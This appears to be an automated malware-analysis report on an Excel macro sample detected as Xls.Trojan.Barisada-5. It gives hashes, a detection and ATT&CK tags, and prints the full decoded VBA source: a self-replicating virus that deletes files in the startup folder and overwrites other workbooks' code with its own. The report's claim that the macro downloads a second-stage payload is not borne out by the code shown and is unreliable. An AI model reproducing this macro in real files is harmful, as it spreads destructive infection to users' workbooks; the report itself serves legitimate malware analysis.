Barisada — Office (OLE) malware analysis

Static analysis result for SHA-256 b5258f67342e2a72…

MALICIOUS

Office (OLE)

Size: 26.0 KB
Created: 2001-03-06 07:31:49
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: fb28660ae4e9fdfeff6ef67cdc0f233c
SHA-1: 55c7fa4b9e4de0083dbcb1e2f2ed3f4c628087a4
SHA-256: b5258f67342e2a72705ce57cfa41cf6afcb1f357ec78f014ffa170a918c9a3fe
140 Risk Score

Malware Insights

Barisada · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Barisada-5. It contains VBA macros that appear to be responsible for downloading and executing a second-stage payload. The macro attempts to save a file named 'fusion.xls' in the application startup path and delete other files, suggesting a downloader or dropper functionality. The presence of VBA macros strongly suggests it was delivered as a spearphishing attachment.

Heuristics 2

  • ClamAV: Xls.Trojan.Barisada-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Barisada-5
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2831 bytes
SHA-256: a9e4d135accc66135cf5a95064b93580e71b51fd7d57a30cd9c4592d37bc1025
Detection: ClamAV: Xls.Trojan.Barisada-5
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub workbook_windowdeactivate(ByVal wn As Excel.Window)

Dim ne_pyun As String
On Error Resume Next
ne_pyun = Dir(Application.StartupPath & "\fusion.xls") 'fusion check
If ne_pyun <> "fusion.xls" Then
    Application.ScreenUpdating = False
    Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\fusion.xls", FileFormat:=xlNormal, addtomru:=False
    'Workbooks("fusion").IsAddin = True
    Kill (Application.StartupPath & "\hjb.xls")
    Kill (Application.StartupPath & "\874.xls")
    Kill (Application.StartupPath & "\khm.xls")
End If

Dim i, lines, ne_pyun_rank As Integer
Dim codeform, ne_pyun_codes As String
For i = 1 To Workbooks.Count
    lines = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
    codeform = Null
    codeform = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.lines(lines, 1)
    If lines <> 0 Then
        If codeform = "'hihihihohoho" Then
            ne_pyun_codes = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.lines(1, lines)
            ne_pyun_rank = i
        End If
    End If
Next i
    
Dim j, k As Integer
For j = 1 To Workbooks.Count
    If j = ne_pyun_rank Then GoTo line100
    For k = 1 To Workbooks(j).VBProject.VBComponents.Count
        lines = Workbooks(j).VBProject.VBComponents.Item(k).CodeModule.CountOfLines
        If lines <> 0 Then
            Workbooks(j).VBProject.VBComponents.Item(k).CodeModule.DeleteLines 1, lines
        End If
    Next k
    Workbooks(j).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.AddFromString (ne_pyun_codes)
line100:
Next j

If ne_pyun <> "fusion.xls" Then
    Workbooks("fusion.xls").Close savechanges:=True
End If

End Sub
'hihihihohoho

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True